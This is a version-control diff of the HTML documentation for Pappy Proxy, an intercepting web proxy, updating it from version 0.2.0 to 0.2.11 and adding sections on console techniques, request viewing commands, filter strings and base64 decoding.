<li class="toctree-l2"><a class="reference internal" href="overview.html#lite-mode">Lite Mode</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#adding-the-ca-cert-to-your-browser">Adding The CA Cert to Your Browser</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#configuration">Configuration</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#general-console-techniques">General Console Techniques</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#generating-pappy-s-ca-cert">Generating Pappy&#8217;s CA Cert</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#browsing-recorded-requests-responses">Browsing Recorded Requests/Responses</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#tags">Tags</a></li>
@ -71,6 +72,7 @@
<li class="toctree-l2"><a class="reference internal" href="overview.html#context">Context</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#filter-strings">Filter Strings</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#scope">Scope</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#decoding-strings">Decoding Strings</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#interceptor">Interceptor</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#repeater">Repeater</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#macros">Macros</a></li>
@ -78,7 +80,11 @@
<li class="toctree-l2"><a class="reference internal" href="overview.html#logging">Logging</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#additional-commands-and-features">Additional Commands and Features</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#plugins">Plugins</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#global-settings">Global Settings</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#using-a-socks-server">Using a SOCKS Server</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#transparent-host-redirection">Transparent Host Redirection</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#faq">FAQ</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#boring-technical-stuff">Boring, Technical Stuff</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#changelog">Changelog</a></li>
</ul>
</li>
@ -95,6 +101,11 @@
<li class="toctree-l2"><a class="reference internal" href="pappyplugins.html#built-in-plugins-as-examples">Built In Plugins As Examples</a></li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="contributing.html">Contributing</a><ul>
<li class="toctree-l2"><a class="reference internal" href="contributing.html#id1">Contributing</a></li>
<li class="toctree-l2"><a class="reference internal" href="contributing.html#feature-wishlist">Feature Wishlist</a></li>
</ul>
</li>
</ul>
</div>
</div>
@ -158,12 +169,12 @@
<li class="right" >
<a href="overview.html" title="The Pappy Proxy"
>next</a> |</li>
<li class="nav-item nav-item-0"><a href="#">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="#">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.3.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

12
docs/build/html/modules.html vendored
View file

@ -6,7 +6,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>pappyproxy &mdash; Pappy Proxy 0.2.0 documentation</title>
<title>pappyproxy &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
@ -14,7 +14,7 @@
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.0',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
@ -23,7 +23,7 @@
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.0 documentation" href="index.html" />
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
</head>
<body role="document">
<div class="related" role="navigation" aria-label="related navigation">
@ -35,7 +35,7 @@
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
@ -112,12 +112,12 @@
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.3.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

BIN
docs/build/html/objects.inv vendored
View file

Binary file not shown.

649
docs/build/html/overview.html vendored
View file

@ -6,7 +6,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>The Pappy Proxy &mdash; Pappy Proxy 0.2.0 documentation</title>
<title>The Pappy Proxy &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
@ -14,7 +14,7 @@
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.0',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
@ -23,7 +23,7 @@
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.0 documentation" href="index.html" />
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
<link rel="next" title="The Pappy Proxy Tutorial" href="tutorial.html" />
<link rel="prev" title="Welcome to Pappy Proxys documentation!" href="index.html" />
</head>
@ -43,7 +43,7 @@
<li class="right" >
<a href="index.html" title="Welcome to Pappy Proxys documentation!"
accesskey="P">previous</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
@ -84,6 +84,8 @@ contributing code and plugins are extremely easy to integrate as a core
feature. So you can also contribute by writing a plugin and letting me
know about it. You can find out more by looking at <a class="reference external" href="https://roglew.github.io/pappy-proxy/pappyplugins.html">the official plugin
docs</a>.</p>
<p>You can find ideas for features to add on <a class="reference external" href="https://roglew.github.io/pappy-proxy/contributing.html">the contributing page in the
docs</a>.</p>
</div>
</div>
<div class="section" id="how-to-use-it">
@ -94,7 +96,7 @@ docs</a>.</p>
<code class="docutils literal"><span class="pre">pip</span></code> or some other command that can handle a <code class="docutils literal"><span class="pre">setup.py</span></code> with
requirements. Once the requirements are installed, you can check that it
installed correctly by running <code class="docutils literal"><span class="pre">pappy</span> <span class="pre">-l</span></code> to start the proxy.</p>
<div class="highlight-python"><div class="highlight"><pre>$ git clone --recursive https://github.com/roglew/pappy-proxy.git
<div class="highlight-python"><div class="highlight"><pre><span></span>$ git clone --recursive https://github.com/roglew/pappy-proxy.git
$ cd pappy-proxy
$ pip install .
</pre></div>
@ -106,7 +108,7 @@ $ pip install .
exported responses, plugin data, etc. will be placed in the current
directory so it&#8217;s good to give your project a directory of its own. To
start a project, do something like:</p>
<div class="highlight-python"><div class="highlight"><pre>$ mkdir test_project
<div class="highlight-python"><div class="highlight"><pre><span></span>$ mkdir test_project
$ cd test_project
$ pappy
Copying default config to directory
@ -134,7 +136,7 @@ a temporary data file in <code class="docutils literal"><span class="pre">/tmp</
be deleted. If you want to run Pappy in lite mode, run Pappy with either
<code class="docutils literal"><span class="pre">-l</span></code> or <code class="docutils literal"><span class="pre">--lite</span></code>.</p>
<p>Example:</p>
<div class="highlight-python"><div class="highlight"><pre>$ pappy -l
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy -l
Temporary datafile is /tmp/tmpw4mGv2
Proxy is listening on port 8000
pappy&gt; quit
@ -228,6 +230,132 @@ proxy. The following fields can be used to configure the proxy:</p>
</table>
<p>See the default <code class="docutils literal"><span class="pre">config.json</span></code> for examples.</p>
</div>
<div class="section" id="general-console-techniques">
<h2>General Console Techniques<a class="headerlink" href="#general-console-techniques" title="Permalink to this headline"></a></h2>
<p>There are a few tricks you can use in general when using Pappy&#8217;s
console. Most of these are provided by the
<a class="reference external" href="https://docs.python.org/2/library/cmd.html">cmd</a> and
<a class="reference external" href="https://pythonhosted.org/cmd2/index.html">cmd2</a>.</p>
<div class="section" id="run-a-shell-command">
<h3>Run a shell command<a class="headerlink" href="#run-a-shell-command" title="Permalink to this headline"></a></h3>
<p>You can run a shell command with <code class="docutils literal"><span class="pre">!</span></code>:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
5 GET vitaly.sexy /netscape.gif 304 Not Modified 0 0 0.08 --
4 GET vitaly.sexy /esr1.jpg 304 Not Modified 0 0 0.07 --
3 GET vitaly.sexy /construction.gif 304 Not Modified 0 0 0.07 --
2 GET vitaly.sexy /vitaly2.jpg 0 N/A -- --
1 GET vitaly.sexy / 304 Not Modified 0 0 0.07 --
pappy&gt; !ls
cmdhistory config.json data.db
pappy&gt;
</pre></div>
</div>
</div>
<div class="section" id="running-python-code">
<h3>Running Python Code<a class="headerlink" href="#running-python-code" title="Permalink to this headline"></a></h3>
<p>You can use the <code class="docutils literal"><span class="pre">py</span></code> command to either run python code or to drop down
to a Python shell.</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; py print &#39;:D &#39;*10
:D :D :D :D :D :D :D :D :D :D
pappy&gt; py
Python 2.7.6 (default, Jun 22 2015, 17:58:13)
[GCC 4.8.2] on linux2
Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.
(ProxyCmd)
py &lt;command&gt;: Executes a Python command.
py: Enters interactive Python mode.
End with ``Ctrl-D`` (Unix) / ``Ctrl-Z`` (Windows), ``quit()``, &#39;`exit()``.
Non-python commands can be issued with ``cmd(&quot;your command&quot;)``.
Run python code from external files with ``run(&quot;filename.py&quot;)``
&gt;&gt;&gt; from pappyproxy import config
&gt;&gt;&gt; config.CONFIG_DICT
{u&#39;data_file&#39;: u&#39;./data.db&#39;, u&#39;history_size&#39;: 1000, u&#39;cert_dir&#39;: u&#39;{DATADIR}/certs&#39;, u&#39;proxy_listeners&#39;: [{u&#39;interface&#39;: u&#39;127.0.0.1&#39;, u&#39;port&#39;: 8000}]}
&gt;&gt;&gt; exit()
pappy&gt;
</pre></div>
</div>
</div>
<div class="section" id="redirect-output-to-file">
<h3>Redirect Output To File<a class="headerlink" href="#redirect-output-to-file" title="Permalink to this headline"></a></h3>
<p>You can use <code class="docutils literal"><span class="pre">&gt;</span></code> to direct output to a file. However, a number of
commands use colored output. If you just redirect these to a file, there
will be additional bytes which represent the ANSI color codes. To get
around this, use the <code class="docutils literal"><span class="pre">nocolor</span></code> command to remove the color from the
command output.</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls &gt; ls.txt
pappy&gt; !xxd -c 32 -g 4 ls.txt
0000000: 1b5b316d 1b5b346d 49442020 56657262 2020486f 73742020 20202020 20202050 .[1m.[4mID Verb Host P
0000020: 61746820 20202020 20202020 20202020 2020532d 436f6465 20202020 20202020 ath S-Code
0000040: 20202020 52657120 4c656e20 20527370 204c656e 20205469 6d652020 20204d6e Req Len Rsp Len Time Mn
0000060: 676c2020 1b5b306d 0a352020 201b5b33 366d4745 541b5b30 6d202020 1b5b3931 gl .[0m.5 .[36mGET.[0m .[91
0000080: 6d766974 616c792e 73657879 1b5b306d 20201b5b 33366d1b 5b306d2f 1b5b3334 mvitaly.sexy.[0m .[36m.[0m/.[34
00000a0: 6d6e6574 73636170 652e6769 661b5b30 6d202020 2020201b 5b33356d 33303420 mnetscape.gif.[0m .[35m304
00000c0: 4e6f7420 4d6f6469 66696564 1b5b306d 20203020 20202020 20202030 20202020 Not Modified.[0m 0 0
00000e0: 20202020 302e3038 20202020 2d2d2020 20200a34 2020201b 5b33366d 4745541b 0.08 -- .4 .[36mGET.
0000100: 5b306d20 20201b5b 39316d76 6974616c 792e7365 78791b5b 306d2020 1b5b3336 [0m .[91mvitaly.sexy.[0m .[36
0000120: 6d1b5b30 6d2f1b5b 33346d65 7372312e 6a70671b 5b306d20 20202020 20202020 m.[0m/.[34mesr1.jpg.[0m
0000140: 201b5b33 356d3330 34204e6f 74204d6f 64696669 65641b5b 306d2020 30202020 .[35m304 Not Modified.[0m 0
0000160: 20202020 20302020 20202020 2020302e 30372020 20202d2d 20202020 0a332020 0 0.07 -- .3
0000180: 201b5b33 366d4745 541b5b30 6d202020 1b5b3931 6d766974 616c792e 73657879 .[36mGET.[0m .[91mvitaly.sexy
00001a0: 1b5b306d 20201b5b 33366d1b 5b306d2f 1b5b3334 6d636f6e 73747275 6374696f .[0m .[36m.[0m/.[34mconstructio
00001c0: 6e2e6769 661b5b30 6d20201b 5b33356d 33303420 4e6f7420 4d6f6469 66696564 n.gif.[0m .[35m304 Not Modified
00001e0: 1b5b306d 20203020 20202020 20202030 20202020 20202020 302e3037 20202020 .[0m 0 0 0.07
0000200: 2d2d2020 20200a32 2020201b 5b33366d 4745541b 5b306d20 20201b5b 39316d76 -- .2 .[36mGET.[0m .[91mv
0000220: 6974616c 792e7365 78791b5b 306d2020 1b5b3336 6d1b5b30 6d2f1b5b 33346d76 italy.sexy.[0m .[36m.[0m/.[34mv
0000240: 6974616c 79322e6a 70671b5b 306d2020 20202020 201b5b33 366d3230 30204f4b italy2.jpg.[0m .[36m200 OK
0000260: 1b5b306d 20202020 20202020 20202020 30202020 20202020 20323033 34303033 .[0m 0 2034003
0000280: 20203135 352e3131 20202d2d 20202020 0a312020 201b5b33 366d4745 541b5b30 155.11 -- .1 .[36mGET.[0
00002a0: 6d202020 1b5b3931 6d766974 616c792e 73657879 1b5b306d 20201b5b 33366d1b m .[91mvitaly.sexy.[0m .[36m.
00002c0: 5b306d2f 1b5b3334 6d1b5b30 6d202020 20202020 20202020 20202020 2020201b [0m/.[34m.[0m .
00002e0: 5b33356d 33303420 4e6f7420 4d6f6469 66696564 1b5b306d 20203020 20202020 [35m304 Not Modified.[0m 0
0000300: 20202030 20202020 20202020 302e3037 20202020 2d2d2020 20200a 0 0.07 -- .
pappy&gt; nocolor ls &gt; ls2.txt
pappy&gt; !xxd -c 32 -g 4 ls2.txt
0000000: 49442020 56657262 2020486f 73742020 20202020 20202050 61746820 20202020 ID Verb Host Path
0000020: 20202020 20202020 2020532d 436f6465 20202020 20202020 20202020 52657120 S-Code Req
0000040: 4c656e20 20527370 204c656e 20205469 6d652020 20204d6e 676c2020 0a352020 Len Rsp Len Time Mngl .5
0000060: 20474554 20202076 6974616c 792e7365 78792020 2f6e6574 73636170 652e6769 GET vitaly.sexy /netscape.gi
0000080: 66202020 20202033 3034204e 6f74204d 6f646966 69656420 20302020 20202020 f 304 Not Modified 0
00000a0: 20203020 20202020 20202030 2e303820 2020202d 2d202020 200a3420 20204745 0 0.08 -- .4 GE
00000c0: 54202020 76697461 6c792e73 65787920 202f6573 72312e6a 70672020 20202020 T vitaly.sexy /esr1.jpg
00000e0: 20202020 33303420 4e6f7420 4d6f6469 66696564 20203020 20202020 20202030 304 Not Modified 0 0
0000100: 20202020 20202020 302e3037 20202020 2d2d2020 20200a33 20202047 45542020 0.07 -- .3 GET
0000120: 20766974 616c792e 73657879 20202f63 6f6e7374 72756374 696f6e2e 67696620 vitaly.sexy /construction.gif
0000140: 20333034 204e6f74 204d6f64 69666965 64202030 20202020 20202020 30202020 304 Not Modified 0 0
0000160: 20202020 20302e30 37202020 202d2d20 2020200a 32202020 47455420 20207669 0.07 -- .2 GET vi
0000180: 74616c79 2e736578 7920202f 76697461 6c79322e 6a706720 20202020 20203230 taly.sexy /vitaly2.jpg 20
00001a0: 30204f4b 20202020 20202020 20202020 30202020 20202020 20323033 34303033 0 OK 0 2034003
00001c0: 20203135 352e3131 20202d2d 20202020 0a312020 20474554 20202076 6974616c 155.11 -- .1 GET vital
00001e0: 792e7365 78792020 2f202020 20202020 20202020 20202020 20202033 3034204e y.sexy / 304 N
0000200: 6f74204d 6f646966 69656420 20302020 20202020 20203020 20202020 20202030 ot Modified 0 0 0
0000220: 2e303720 2020202d 2d202020 200a0a .07 -- ..
pappy&gt;
</pre></div>
</div>
<p>If you want to write the contents of a request or response to a file,
don&#8217;t use <code class="docutils literal"><span class="pre">nocolor</span></code> with <code class="docutils literal"><span class="pre">vfq</span></code> or <code class="docutils literal"><span class="pre">vfs</span></code>. Use just the <code class="docutils literal"><span class="pre">vbq</span></code> or
<code class="docutils literal"><span class="pre">vbs</span></code> commands.</p>
<table border="1" class="docutils">
<colgroup>
<col width="8%" />
<col width="92%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Command</th>
<th class="head">Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td><code class="docutils literal"><span class="pre">nocolor</span></code></td>
<td>Run a command and print its output without ASCII escape codes. Intended for use when redirecting output to a file. Should only be used with text and not with binary data.</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="section" id="generating-pappy-s-ca-cert">
<h2>Generating Pappy&#8217;s CA Cert<a class="headerlink" href="#generating-pappy-s-ca-cert" title="Permalink to this headline"></a></h2>
<p>In order to intercept and modify requests to sites that use HTTPS, you
@ -259,9 +387,9 @@ argument to have it put the generated certs in a different directory.</p>
<p>The following commands can be used to view requests and responses</p>
<table border="1" class="docutils">
<colgroup>
<col width="40%" />
<col width="4%" />
<col width="7%" />
<col width="89%" />
<col width="56%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Command</th>
@ -274,30 +402,74 @@ argument to have it put the generated certs in a different directory.</p>
<td>list, ls</td>
<td>List requests that are in the current context (see Context section). Has information like the host, target path, and status code. With no arguments, it will print the 25 most recent requests in the current context. If you pass &#8216;a&#8217; or &#8216;all&#8217; as an argument, it will print all the requests in the current context. If you pass a number &#8220;n&#8221; as an argument, it will print the n most recent requests in the current context.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">sm</span></code></td>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">sm</span></code> [p]</td>
<td>sm, site_map</td>
<td>Print a tree showing the site map. It will display all requests in the current context that did not have a 404 response.</td>
<td>Print a tree showing the site map. It will display all requests in the current context that did not have a 404 response. This has to go through all of the requests in the current context so it may be slow. If the <code class="docutils literal"><span class="pre">p</span></code> option is given, it will print the paths as paths rather than as a tree.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">viq</span> <span class="pre">&lt;id(s)&gt;</span></code></td>
<td>view_request_info, viq</td>
<td>View additional information about requests. Includes the target port, if SSL was used, applied tags, and other information.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">vfq</span> <span class="pre">&lt;id(s)&gt;</span></code></td>
<td>view_full_request, vfq</td>
<td>view_full_request, vfq, kjq</td>
<td>[V]iew [F]ull Re[Q]uest, prints the full request including headers and data.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">vbq</span> <span class="pre">&lt;id(s)&gt;</span></code></td>
<td>view_request_bytes, vbq</td>
<td>[V]iew [B]ytes of Re[Q]uest, prints the full request including headers and data without coloring or additional newlines. Use this if you want to write a request to a file.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">ppq</span> <span class="pre">&lt;format&gt;</span> <span class="pre">&lt;id(s)&gt;</span></code></td>
<td>pretty_print_request, ppq</td>
<td>Pretty print a request with a specific format. See the table below for a list of formats.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">vhq</span> <span class="pre">&lt;id(s)&gt;</span></code></td>
<td>view_request_headers, vhq</td>
<td>[V]iew [H]eaders of a Re[Q]uest. Prints just the headers of a request.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">vfs</span> <span class="pre">&lt;id(s)&gt;</span></code></td>
<td>view_full_response, vfs</td>
<td>view_full_response, vfs, kjs</td>
<td>[V]iew [F]ull Re[S]ponse, prints the full response associated with a request including headers and data.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">vhs</span> <span class="pre">&lt;id(s)&gt;</span></code></td>
<td>view_response_headers, vhs</td>
<td>[V]iew [H]eaders of a Re[S]ponse. Prints just the headers of a response associated with a request.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">vbs</span> <span class="pre">&lt;id(s)&gt;</span></code></td>
<td>view_response_bytes, vbs</td>
<td>[V]iew [B]ytes of Re[S]ponse, prints the full response including headers and data without coloring or additional newlines. Use this if you want to write a response to a file.</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">pps</span> <span class="pre">&lt;format&gt;</span> <span class="pre">&lt;id(s)&gt;</span></code></td>
<td>pretty_print_response, pps</td>
<td>Pretty print a response with a specific format. See the table below for a list of formats.</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">pprm</span> <span class="pre">&lt;id(s)&gt;</span></code></td>
<td>print_params, pprm</td>
<td>Print a summary of the parameters submitted with the request. It will include URL params, POST params, and/or cookies</td>
</tr>
<tr class="row-even"><td><code class="docutils literal"><span class="pre">pri</span> <span class="pre">[ct]</span> <span class="pre">[key(s)]</span> <span class="pre">|</span> <span class="pre">param_info,</span> <span class="pre">pri</span> <span class="pre">|</span> <span class="pre">Print</span> <span class="pre">a</span> <span class="pre">summary</span> <span class="pre">of</span> <span class="pre">the</span> <span class="pre">parameters</span> <span class="pre">and</span> <span class="pre">values</span> <span class="pre">submitted</span> <span class="pre">by</span> <span class="pre">in-context</span> <span class="pre">requests.</span> <span class="pre">You</span> <span class="pre">can</span> <span class="pre">pass</span> <span class="pre">in</span> <span class="pre">keys</span> <span class="pre">to</span> <span class="pre">limit</span> <span class="pre">which</span> <span class="pre">values</span> <span class="pre">will</span> <span class="pre">be</span> <span class="pre">shown.</span> <span class="pre">If</span> <span class="pre">you</span> <span class="pre">also</span> <span class="pre">provide</span></code>ct<code class="docutils literal"><span class="pre">as</span> <span class="pre">the</span> <span class="pre">first</span> <span class="pre">argument,</span> <span class="pre">it</span> <span class="pre">will</span> <span class="pre">include</span> <span class="pre">any</span> <span class="pre">keys</span> <span class="pre">that</span> <span class="pre">are</span> <span class="pre">passed</span> <span class="pre">as</span> <span class="pre">arguments.</span> <span class="pre">|</span> <span class="pre">|</span></code>watch`</td>
<td>watch</td>
<td>Print requests and responses in real time as they pass through the proxy.</td>
</tr>
</tbody>
</table>
<p>Available formats for <code class="docutils literal"><span class="pre">ppq</span></code> and <code class="docutils literal"><span class="pre">pps</span></code> commands:</p>
<table border="1" class="docutils">
<colgroup>
<col width="17%" />
<col width="83%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Format</th>
<th class="head">Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td><code class="docutils literal"><span class="pre">form</span></code></td>
<td>Print POST data submitted from a form (normal post data)</td>
</tr>
<tr class="row-odd"><td><code class="docutils literal"><span class="pre">json</span></code></td>
<td>Print as JSON</td>
</tr>
</tbody>
</table>
<p>The table shown by <code class="docutils literal"><span class="pre">ls</span></code> will have the following columns:</p>
@ -484,24 +656,24 @@ will be a part of the current context.</p>
<p>Filter strings define a condition that a request/response pair must pass
to be part of the context. Most filter strings have the following
format:</p>
<div class="highlight-python"><div class="highlight"><pre>&lt;field&gt; &lt;comparer&gt; &lt;value&gt;
<div class="highlight-python"><div class="highlight"><pre><span></span>&lt;field&gt; &lt;comparer&gt; &lt;value&gt;
</pre></div>
</div>
<p>Where <code class="docutils literal"><span class="pre">&lt;field&gt;</span></code> is some part of the request/response, <code class="docutils literal"><span class="pre">&lt;comparer&gt;</span></code>
is some comparison to <code class="docutils literal"><span class="pre">&lt;value&gt;</span></code>. For example, if you wanted a filter
that only matches requests to <code class="docutils literal"><span class="pre">target.org</span></code>, you could use the
following filter string:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="n">host</span> <span class="ow">is</span> <span class="n">target</span><span class="o">.</span><span class="n">org</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="n">host</span> <span class="ow">is</span> <span class="n">target</span><span class="o">.</span><span class="n">org</span>
<span class="n">field</span> <span class="o">=</span> <span class="s">&quot;host&quot;</span>
<span class="n">comparer</span> <span class="o">=</span> <span class="s">&quot;is&quot;</span>
<span class="n">value</span> <span class="o">=</span> <span class="s">&quot;target.org&quot;</span>
<span class="n">field</span> <span class="o">=</span> <span class="s2">&quot;host&quot;</span>
<span class="n">comparer</span> <span class="o">=</span> <span class="s2">&quot;is&quot;</span>
<span class="n">value</span> <span class="o">=</span> <span class="s2">&quot;target.org&quot;</span>
</pre></div>
</div>
<p>Also <strong>if you prefix a comparer with &#8216;n&#8217; it turns it into a negation.</strong>
Using the previous example, the following will match any request except
for ones where the host contains <code class="docutils literal"><span class="pre">target.org</span></code>:</p>
<div class="highlight-python"><div class="highlight"><pre>host nis target.org
<div class="highlight-python"><div class="highlight"><pre><span></span>host nis target.org
field = &quot;host&quot;
comparer = &quot;nis&quot;
@ -510,7 +682,7 @@ value = &quot;target.org&quot;
</div>
<p>For fields that are a list of key/value pairs (headers, get params, post
params, and cookies) you can use the following format:</p>
<div class="highlight-python"><div class="highlight"><pre>&lt;field&gt; &lt;comparer1&gt; &lt;value1&gt;[ &lt;comparer2&gt; &lt;value2&gt;]
<div class="highlight-python"><div class="highlight"><pre><span></span>&lt;field&gt; &lt;comparer1&gt; &lt;value1&gt;[ &lt;comparer2&gt; &lt;value2&gt;]
</pre></div>
</div>
<p>This is a little more complicated. If you don&#8217;t give comparer2/value2,
@ -518,7 +690,7 @@ the filter will pass any pair where the key or the value matches
comparer1 and value1. If you do give comparer2/value2, the key must
match comparer1/value1 and the value must match comparer2/value2 For
example:</p>
<div class="highlight-python"><div class="highlight"><pre>Filter A:
<div class="highlight-python"><div class="highlight"><pre><span></span>Filter A:
cookie contains Session
Filter B:
@ -571,6 +743,16 @@ Matches both A and B but not C
<td>The body (data section) of either the request or the response</td>
<td>String</td>
</tr>
<tr class="row-even"><td>reqbody</td>
<td>qbody, qdata, qbd, qdt</td>
<td>The body (data section) of th request</td>
<td>String</td>
</tr>
<tr class="row-odd"><td>rspbody</td>
<td>sbody, sdata, sbd, sdt</td>
<td>The body (data section) of th response</td>
<td>String</td>
</tr>
<tr class="row-even"><td>verb</td>
<td>verb, vb</td>
<td>The HTTP verb of the request (ie GET, POST)</td>
@ -586,6 +768,16 @@ Matches both A and B but not C
<td>An HTTP header (ie User-Agent, Basic-Authorization) in the request or response</td>
<td>Key/Value</td>
</tr>
<tr class="row-odd"><td>reqheader</td>
<td>reqheader, qhd</td>
<td>An HTTP header in the request</td>
<td>Key/Value</td>
</tr>
<tr class="row-even"><td>rspheader</td>
<td>rspheader, shd</td>
<td>An HTTP header in the response</td>
<td>Key/Value</td>
</tr>
<tr class="row-odd"><td>rawheaders</td>
<td>rawheaders, rh</td>
<td>The entire header section (as one string) of either the head or the response</td>
@ -697,8 +889,23 @@ can still negate these.</p>
<td>after, af</td>
<td>Filters out any request that is not before the given request. Filters out any request without a time.</td>
</tr>
<tr class="row-even"><td>inv</td>
<td>inf</td>
<td>Inverts a filter string. Anything that matches the filter string will not pass the filter.</td>
</tr>
</tbody>
</table>
<p>Examples:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>Only show requests before request 1234
f b4 1234
Only show requests after request 1234
f af 1234
Show requests without a csrf parameter
f inv param ct csrf
</pre></div>
</div>
</div>
</div>
<div class="section" id="scope">
@ -789,6 +996,129 @@ The <code class="docutils literal"><span class="pre">fbi</span></code> command a
</table>
</div>
</div>
<div class="section" id="decoding-strings">
<h2>Decoding Strings<a class="headerlink" href="#decoding-strings" title="Permalink to this headline"></a></h2>
<p>These features try to fill a similar role to Burp&#8217;s decoder. Each
command will automatically copy the results to the clipboard. In
addition, if no string is given, the commands will encode/decode
whatever is already in the clipboard. Here is an example of how to
base64 encode/decode a string.</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; b64e &quot;Hello World!&quot;
SGVsbG8gV29ybGQh
pappy&gt; b64d
Hello World!
pappy&gt;
</pre></div>
</div>
<p>And if the result contains non-printable characters, a hexdump will be
produced instead</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; b64d ImALittleTeapot=
0000 22 60 0b 8a db 65 79 37 9a a6 8b &quot;`...ey7...
pappy&gt;
</pre></div>
</div>
<p>The following commands can be used to encode/decode strings:</p>
<table border="1" class="docutils">
<colgroup>
<col width="12%" />
<col width="16%" />
<col width="72%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Command</th>
<th class="head">Aliases</th>
<th class="head">Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td><code class="docutils literal"><span class="pre">base64_decode</span></code></td>
